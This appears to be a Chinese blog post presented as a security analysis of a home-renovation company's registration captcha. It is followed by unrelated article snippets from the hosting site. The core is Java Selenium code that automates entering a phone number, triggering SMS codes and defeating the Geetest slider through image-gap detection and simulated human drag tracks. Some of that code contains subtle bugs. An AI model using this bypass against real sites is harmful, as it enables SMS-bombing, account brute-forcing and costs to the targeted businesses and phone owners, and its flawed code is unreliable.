【爱空间_登录安全分析报告】

news2024/11/20 13:30:11

前言
由于网站注册入口容易被黑客攻击,存在如下安全问题:

  1. 暴力破解密码,造成用户信息泄露
  2. 短信盗刷的安全问题,影响业务及导致用户投诉
  3. 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞
    在这里插入图片描述

所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案, 但在机器学习能力提高的当下,连百度这样的大厂都遭受攻击导致点名批评, 图形验证及交互验证方式的安全性到底如何? 请看具体分析

一、 爱空间 PC 注册入口

简介:爱空间,2014年创立, [1]在中国大陆地区的14个主要城市设有分公司及家装体验馆,员工规模近7,000人。 [57]爱空间致力于通过科技创新,建设以“供应链、信息化系统、产业化工人”三大基础设施为支柱的标准化一站式整体家装解决方案。先后获得顺为资本、国美资本数亿元投资,通过让消费者安全放心的儿童级环保标准、33天准时完工的品效合一、100%直管施工团队等颠覆性创新模式,成为家装行业口碑最好的企业之一。 [47]2020年提出“让爱有空间,让空间有爱”的全新企业使命。

在这里插入图片描述

二、 安全性分析报告:

采用极验的 V1版本(knob),容易被模拟器绕过甚至逆向后暴力攻击,滑动拼图识别率在 95% 以上。
在这里插入图片描述

三、 测试方法:

前端界面分析, 采用的是极验1.0 ,最早的一个版本, 最大特点就是将图片做分割后,在前端再做合并,这就好办了, 网上有大量现成的逆向文章及视频参考,不过我们这次不用逆向, 只是采用模拟器的方式,关键点主要模拟器交互、距离识别和轨道算法3部分。

在这里插入图片描述

  1. 模拟器交互部分

public RetEntity send(WebDriver driver, String areaCode, String phone) {
		try {
			driver.get(smsUrl);
			// 输入手机号
			WebElement phoneInput = driver.findElement(By.name("mobile"));
			phoneInput.clear();
			for (int i = 0, l = phone.length(); i < l; i++) {
				phoneInput.sendKeys(String.valueOf(phone.charAt(i)));
				phoneInput.click();
			}
			Thread.sleep(500);

			// 点击发送验证码
			WebElement sendBtn = GeeSplitApi.waitForLoad(driver, By.className("sendSMS"), 5);
			sendBtn.click();

			geetApi.gtSliderKnob(driver, 0);
			return null;
		} catch (Exception e) {
			System.out.println(e.toString());
			return null;
		}
	}


  1. 获取滑动图片及调用移动交互

public boolean gtSliderKnob(WebDriver driver, Integer offSet) {
		try {
			// 获取滑动按钮
			By moveBy = By.cssSelector("[class='gt_slider_knob gt_show']");
			GeetSplitApi.waitForLoad(driver, moveBy);
			WebElement moveElement = driver.findElement(moveBy);
			int i = 0;
			String gtInfo;
			while (i++ < 3) {
				try {
					// 获取滑动距离
					int distance = GeetSplitApi.getMoveDistance(driver);
					if (distance == 0) {
						gtInfo = "get distance err";
						continue;
					}
					// 滑动
					if (offSet != null)
						ActionMove.move(driver, moveElement, distance - offSet);
					else
						ActionMove.move(driver, moveElement, distance);
					// 滑动结果
					Thread.sleep(2 * 1000);
					By gtInfoBy = By.className("gt_info_content");
					gtInfo = driver.findElement(gtInfoBy).getAttribute("innerHTML");
					System.out.println();
					if (gtInfo.isEmpty() || gtInfo.contains("速度超过")) {
						return true;
					} else if (gtInfo.contains("出现错误")) {
						gtInfo = "no success,try time=" + 3;
						continue;
					}
				} catch (Exception e) {
					continue;
				}
			}
			return false;
		} catch (Exception e) {
			System.out.println("getAndMove() " + e.toString());
			logger.error(e.toString());
			return false;
		}
	}

2. 距离识别

/**
	 * 计算需要平移的距离
	 * 
	 * @param fullImgPath
	 *            完整背景图片文件名
	 * @param bgImgPath含有缺口背景图片文件名
	 * @return
	 * @throws IOException
	 */
	public static int getMoveDistance(String fullImgPath, String bgImgPath) {
		System.out.println("fullImgPath=" + fullImgPath);
		File fullFile = new File(fullImgPath);
		File bgFile = new File(bgImgPath);
		boolean fullExists = fullFile.exists();
		boolean bgExists = bgFile.exists();
		if (fullExists && bgExists) {
			String abPath = bgFile.getAbsolutePath();
			int l = abPath.lastIndexOf(".");
			String out = abPath.substring(0, l) + "-o" + abPath.substring(l);
			return getComareImg(fullFile, bgFile, out);
		} else {
			System.out.println("fullExists(" + fullImgPath + ")=" + fullExists + "\nbgExists(" + bgImgPath + ")=" + bgExists);
			return -1;
		}
	}
/**
	 * 计算需要平移的距离
	 * 
	 * @param driver
	 * @param fullImgPath完整背景图片文件名
	 * @param bgImgPath含有缺口背景图片文件名
	 * @return
	 * @throws IOException
	 */
	private static int getComareImg(Object fullObj, Object bgObj, String out) {
		System.out.println("getComareImg() begin");
		try {
			if (fullObj == null || bgObj == null) {
				return -1;
			}
			BufferedImage fullBI = (fullObj instanceof File) ? ImageIO.read((File) fullObj) : ImageIO.read((ByteArrayInputStream) fullObj);
			BufferedImage bgBI = (bgObj instanceof File) ? ImageIO.read((File) bgObj) : ImageIO.read((ByteArrayInputStream) bgObj);
			List<Integer> list;
			Color ca, cb;
			Map<Integer, List<Integer>> xMap = new TreeMap<Integer, List<Integer>>();
			// 将头35列的最大不同值取出, 作为右边图像的基础差
			Long tifTotl = 0L;
			int tifLeft = 0;
			int tifCount = 0;
			for (int i = 0; i < bgBI.getWidth(); i++) {
				for (int j = 0; j < bgBI.getHeight(); j++) {
					ca = new Color(fullBI.getRGB(i, j));
					cb = new Color(bgBI.getRGB(i, j));
					int diff = diff(ca, cb);
					if (i <= 35 && tifLeft < diff) {
						tifLeft = (diff >= 255) ? 255 : diff;
					} else if (diff > tifLeft) {
						tifTotl += diff;
						tifCount++;
					}
				}
			}

			Long tifAvg = (tifCount > 0) ? (tifTotl / tifCount) : 0L;
			if (tifLeft <= 0 && tifAvg >= 2) {
				tifAvg = tifAvg / 2;
			}
			for (int i = 35; i < bgBI.getWidth(); i++) {
				for (int j = 0; j < bgBI.getHeight(); j++) {
					ca = new Color(fullBI.getRGB(i, j));
					cb = new Color(bgBI.getRGB(i, j));
					int diff = diff(ca, cb);
					if (diff >= tifAvg) {
						list = xMap.get(i);
						if (list == null) {
							list = new ArrayList<Integer>();
							xMap.put(i, list);
						}
						list.add(j);
						xMap.put(i, list);
					}
				}
			}
			System.out.println("  |--tifLeft=" + tifLeft + ",tifTotl=" + tifTotl + ",tifCount=" + tifCount + ",tifAvg=" + tifAvg + ",xMap.size=" + xMap.size());

			int minX = 0;
			int maxX = 0;
			for (Integer x : xMap.keySet()) {
				list = xMap.get(x);
				minX = (minX == 0) ? x : minX;
				maxX = x;
				for (int y : list) {
					cb = new Color(bgBI.getRGB(x, y));
					int gray = (int) (0.3 * cb.getRed() + 0.59 * cb.getGreen() + 0.11 * cb.getBlue());
					bgBI.setRGB(x, y, gray);
				}
			}

			// 标记直线位置
			for (int y = 0; y < bgBI.getHeight(); y++) {
				bgBI.setRGB(minX, y, Color.red.getRGB());
			}
			int width = maxX - minX;
			File destFile = new File(out);
			Thumbnails.of(bgBI).scale(1f).toFile(destFile);
			System.out.println("  |---xMap.size=" + xMap.size() + " minX=" + minX + ",maxX=" + maxX + ",width=" + width);
			return minX;
		} catch (Exception e) {
			System.out.println(e.toString());
			for (StackTraceElement elment : e.getStackTrace()) {
				System.out.println(elment.toString());
			}
			logger.error("getMoveDistance() err = " + e.toString());
			return 0;
		}
	}

	private static int diff(Color ca, Color cb) {
		int d = Math.abs(ca.getRed() - cb.getRed()) + Math.abs(ca.getGreen() - cb.getGreen()) + Math.abs(ca.getBlue() - ca.getBlue());
		return d;
	}

3. 轨道生成及移动算法

/**
	 * 双轴轨道生成算法,主要实现平滑加速和减速
	 * 
	 * @param distance
	 * @return
	 */
	public static List<Integer[]> getXyTrack(int distance) {
		List<Integer[]> track = new ArrayList<Integer[]>();// 移动轨迹
		try {
			int a = (int) (distance / 3.0) + random.nextInt(10);
			int h = 0, current = 0;// 已经移动的距离
			BigDecimal midRate = new BigDecimal(0.7 + (random.nextInt(10) / 100.00)).setScale(4, BigDecimal.ROUND_HALF_UP);
			BigDecimal mid = new BigDecimal(distance).multiply(midRate).setScale(0, BigDecimal.ROUND_HALF_UP);// 减速阈值
			BigDecimal move = null;// 每次循环移动的距离
			List<Integer[]> subList = new ArrayList<Integer[]>();// 移动轨迹
			boolean plus = true;
			Double t = 0.18, v = 0.00, v0;
			while (current <= distance) {
				h = random.nextInt(2);
				if (current > distance / 2) {
					h = h * -1;
				}
				v0 = v;
				v = v0 + a * t;
				move = new BigDecimal(v0 * t + 1 / 2 * a * t * t).setScale(4, BigDecimal.ROUND_HALF_UP);// 加速
				if (move.intValue() < 1)
					move = new BigDecimal(1L);
				if (plus) {
					track.add(new Integer[] { move.intValue(), h });
				} else {
					subList.add(0, new Integer[] { move.intValue(), h });
				}
				current += move.intValue();
				if (plus && current >= mid.intValue()) {
					plus = false;
					move = new BigDecimal(0L);
					v = 0.00;
				}
			}
			track.addAll(subList);
			int bk = current - distance;
			if (bk > 0) {
				for (int i = 0; i < bk; i++) {
					track.add(new Integer[] { -1, h });
				}
			}
			System.out.println("getMoveTrack(" + midRate + ") a=" + a + ",distance=" + distance + " -> mid=" + mid.intValue() + " size=" + track.size());
			return track;
		} catch (Exception e) {
			System.out.print(e.toString());
			return null;
		}
	}
/**
	 * 模拟人工移动
	 * 
	 * @param driver
	 * @param element页面滑块
	 * @param distance需要移动距离
	 * @throws InterruptedException
	 */
	public static void move(WebDriver driver, WebElement element, int distance) throws InterruptedException {
		List<Integer[]> track = getXyTrack(distance);
		if (track == null || track.size() < 1) {
			System.out.println("move() track=" + track);
		}
		int moveY, moveX;
		StringBuffer sb = new StringBuffer();
		try {
			Actions actions = new Actions(driver);
			actions.clickAndHold(element).perform();
			Thread.sleep(20);
			long begin, cost;
			Integer[] move;
			int sum = 0;
			for (int i = 0; i < track.size(); i++) {
				begin = System.currentTimeMillis();
				move = track.get(i);
				moveX = move[0];
				sum += moveX;
				moveY = move[1];
				if (moveX < 0) {
					if (sb.length() > 0) {
						sb.append(",");
					}
					sb.append(moveX);
				}
				actions.moveByOffset(moveX, moveY).perform();
				cost = System.currentTimeMillis() - begin;
				if (cost < 3) {
					Thread.sleep(3 - cost);
				}
			}
			if (sb.length() > 0) {
				System.out.println("-----backspace[" + sb.toString() + "]sum=" + sum + ",distance=" + distance);
			}
			Thread.sleep(180);
			actions.release(element).perform();
			Thread.sleep(500);
		} catch (Exception e) {
			StringBuffer er = new StringBuffer("move() " + e.toString() + "\n");
			for (StackTraceElement elment : e.getStackTrace())
				er.append(elment.toString() + "\n");
			logger.error(er.toString());
			System.out.println(er.toString());
		}
	}
  1. 图片比对结果测试样例:
    在这里插入图片描述

四丶结语

爱空间作为房屋装修行业的巨头, 采用的是通俗的滑动验证产品, 在一定程度上提高了用户体验, 不过随着图形识别技术及机器学习能力的提升,所以在网上破解的文章和教学视频也是大量存在,并且经过验证的确有效, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。

很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。

有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。

所以大家在安全方面还是要重视。(血淋淋的栗子!)#安全短信#

戳这里→康康你手机号在过多少网站注册过!!!

谷歌图形验证码在AI 面前已经形同虚设,所以谷歌宣布退出验证码服务, 那么当所有的图形验证码都被破解时,大家又该如何做好防御呢?

>>相关阅读
《腾讯防水墙滑动拼图验证码》
《百度旋转图片验证码》
《网易易盾滑动拼图验证码》
《顶象区域面积点选验证码》
《顶象滑动拼图验证码》
《极验滑动拼图验证码》
《使用深度学习来破解 captcha 验证码》
《验证码终结者-基于CNN+BLSTM+CTC的训练部署套件》

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1720296.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

模型 FABE(特性 优势 好处 证据)法则

说明&#xff1a;系列文章 分享 模型&#xff0c;了解更多&#x1f449; 模型_思维模型目录。特性、优势、好处、证据&#xff0c;一气呵成。 1 FABE法则的应用 1.1 FABE法则营销商用跑步机 一家高端健身器材公司的销售代表正在向一家新开的健身房推销他们的商用跑步机。以下…

孩子用的灯什么样的好?安利几款适合孩子用的护眼台灯

随着学生们重返校园&#xff0c;家长和孩子们忙于新学期的准备工作&#xff0c;眼睛健康的考量自然也在其中。这也是为何近年来护眼台灯越来越受到欢迎的原因之一。作为一个长期近视并且日常用眼时间较长的人&#xff0c;我本人对护眼台灯有着长期的使用经历&#xff0c;并对它…

如何创建一个Angular项目(超简单)

1、安装Node.js&#xff08;官网Node.js下载&#xff09; 2、运行node -v和npm -v两条命令&#xff08;检验是否下载成功Node.js&#xff09; 3、npm i -g cnpm --registryhttps://registry.npmmirror.com&#xff08;用npm安装cnpm&#xff0c;将镜像源设置为国内镜像源&…

接入knife4j-openapi3访问/doc.html页面空白问题

大概率拦截器拦截下来了&#xff0c;我们F12看网络请求进行排查 都是 /webjars/ 路径下的资源被拦截了&#xff0c;只需在拦截器中添加该白名单即可"/webjars/**" 具体配置如下&#xff1a; Configuration public class WebConfig implements WebMvcConfigurer {priv…

云端数据提取:安全、高效地利用无限资源

在当今的大数据时代&#xff0c;企业和组织越来越依赖于云平台存储和处理海量数据。然而&#xff0c;随着数据的指数级增长&#xff0c;数据的安全性和高效的数据处理成为了企业最为关心的议题之一。本文将探讨云端数据安全的重要性&#xff0c;并提出一套既高效又安全的数据提…

图像加雾算法的研究与应用

目录 前言 一、图像加雾 1、基于传统方法的雾图合成 2、基于深度学习的雾图合成 3、基于Lightroom Classic实现软件加雾 4、基于深度图的方法实现加雾 二、开源的数据集 三、参考文章 前言 在去雾任务当中&#xff0c;训练和评估去雾算法需要大量的带有雾霾和无雾霾的…

超维小课堂 | 1、Pixhawk硬件平台和PX4固件以及QGC地面站之间的关联和区别

Pixhawk硬件平台和PX4固件以及QGC地面站之间的关联和区别 一、Pixhawk是无人机飞控的硬件平台。 主要集成了相关的单片机芯片和各种传感器的外围电路&#xff0c;因此&#xff0c;可以直观的认为Pixhawk一个由各种硬件模块整合成的硬件平台&#xff0c;类似于集成好的单片机开…

【Qt知识】Qt中的对象树是什么?

在深入Qt编程的世界时&#xff0c;你会频繁遇到一个核心概念——对象树&#xff08;Object Tree&#xff09;。这个概念是Qt框架管理内存、处理事件和组织用户界面元素的基础。 什么是Qt对象树&#xff1f; 如果你的Qt应用程序就像一片茂盛的森林&#xff0c;而这片森林中的每…

CameraProvider启动流程

从Android 8.0之后&#xff0c;Android 引入Treble机制&#xff0c;主要是为了解决目前Android 版本之间升级麻烦的问题&#xff0c;将OEM适配的部分vendor与google 对android 大框架升级的部分system部分做了分离&#xff0c;一旦适配了一个版本的vendor信息之后&#xff0c;之…

炫云亮相第二十届中国国际动漫节国际动漫游戏商务大会!

5月28日-29日&#xff0c;备受瞩目的第二十届中国国际动漫节国际动漫游戏商务大会(iABC2024)在杭州滨江开元名都大酒店隆重召开&#xff01;本届大会以动漫IP为核心&#xff0c;从源头到全系列数字内容&#xff0c;探索创新协同、融合发展、价值转化&#xff0c;并对重点作品和…

校园安保巡逻机器人

2023年8月5日&#xff0c;陕西西安一高校实验室起火冒烟&#xff0c;导致学校化学实验室发生火灾。2022年8月3日&#xff0c;一名歹徒持械闯入江西吉安安福县城的一家私立幼儿园&#xff0c;对着无辜的幼儿行凶伤人&#xff0c;造成3死6伤。 像这样的事故有不断地发生&#xf…

计算机基础学习路线

计算机基础学习路线 整理自学计算机基础的过程&#xff0c;虽学习内容众多&#xff0c;然始终相信世上无难事&#xff0c;只怕有心人&#xff0c;期间也遇到许多志同道合的同学&#xff0c;现在也分享自己的学习过程来帮助有需要的。 一、数据结构与算法 视频方面我看的是青…

DNF手游攻略:勇士进阶指南!

在即将到来的6月5日&#xff0c;《DNF手游》将迎来一场盛大的更新&#xff0c;此次更新带来了大量新内容和玩法&#xff0c;极大丰富了游戏的体验。本文将为广大玩家详细解析此次更新的亮点&#xff0c;包括新增的组队挑战玩法“罗特斯入门团本”、新星使宠物的推出、宠物进化功…

【Android】

hint在text显示提示内容 设置主键&#xff0c;在mainactivity // 获取SharedPreferences对象存放的用户名和密码&#xff0c;并设为相应组件的值 //指定key的值&#xff0c;及获取不到值时使用的默认值 String sName sp.getString("name", "unknown")…

pom文件中,Maven导入依赖出现 Dependency not found

解决方案&#xff1a; 1、首先看一下自己的Maven是否配置好了 2、再检查一下镜像是否正确 3、如果上面都没有问题&#xff0c;看 dependencyManagement 标签 我这个出错&#xff0c;爆一大片红就是因为 这个标签 dependencyManagement 解决方法&#xff1a;在父工程中进行依…

实现样式一键切换

实现效果实现方法操作步骤 1.实现效果类似于&#xff1a; 点击切换后更改样式为&#xff1a; 2.实现方法 1.通过css变量切换主题 2.通过link引入css文件切换主题 3.实现方法 定义下拉框双向绑定数据&#xff08;写到根组件app.vue中&#xff09;&#xff0c; 设置theme默认值…

【产品经理】从父订单到仓库出库单

订单拆单到仓库发货&#xff0c;整个流程是什么样的&#xff1f;拆单系统又分为哪几个部分&#xff1f; 正常购物的流程&#xff1a;选购好商品从购物车下单、生成订单、确认订单支付、然后坐等收货、收到货确认收货。 从购物车里面会选多个商家的商品一起下单&#xff0c;有时…

Python | Leetcode Python题解之第120题三角形最小路径和

题目&#xff1a; 题解&#xff1a; class Solution:def minimumTotal(self, triangle: List[List[int]]) -> int:n len(triangle)f [0] * nf[0] triangle[0][0]for i in range(1, n):f[i] f[i - 1] triangle[i][i]for j in range(i - 1, 0, -1):f[j] min(f[j - 1], …

Flutter基础 -- Dart 语言 -- 注释函数表达式

目录 1. 注释 1.1 单行注释 1.2 多行注释 1.3 文档注释 2. 函数 2.1 定义 2.2 可选参数 2.3 可选参数 默认值 2.4 命名参数 默认值 2.5 函数内定义 2.6 Funcation 返回函数对象 2.7 匿名函数 2.8 作用域 3. 操作符 3.1 操作符表 3.2 算术操作符 3.3 相等相关的…

使用cad绘制一个螺旋输送机

1、第一步&#xff0c;绘制一个矩形 2、使用绘图中的样条线拟合曲线&#xff0c;绘制螺旋线。 绘制时使用上下辅助线、阵列工具绘制多个竖线保证样条线顶点在同一高度。 3、调整矩形右侧的两个顶点&#xff0c;使其变形。 矩形1和矩形2连接时&#xff0c;使用blend命令&#…